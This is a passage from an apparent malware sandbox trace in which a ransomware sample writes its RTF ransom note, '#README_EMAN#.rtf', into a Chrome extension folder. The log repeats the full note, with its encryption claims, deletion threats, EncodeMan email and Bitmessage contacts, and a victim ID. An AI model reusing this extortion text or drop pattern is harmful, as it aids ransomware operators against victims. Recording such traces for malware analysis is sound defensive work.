t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.309] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.309] CloseHandle (hObject=0x294) returned 1 [0285.310] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\#readme_eman#.rtf")) returned 0xffffffff [0285.310] GetLastError () returned 0x2 [0285.310] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.310] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.310] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.310] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES 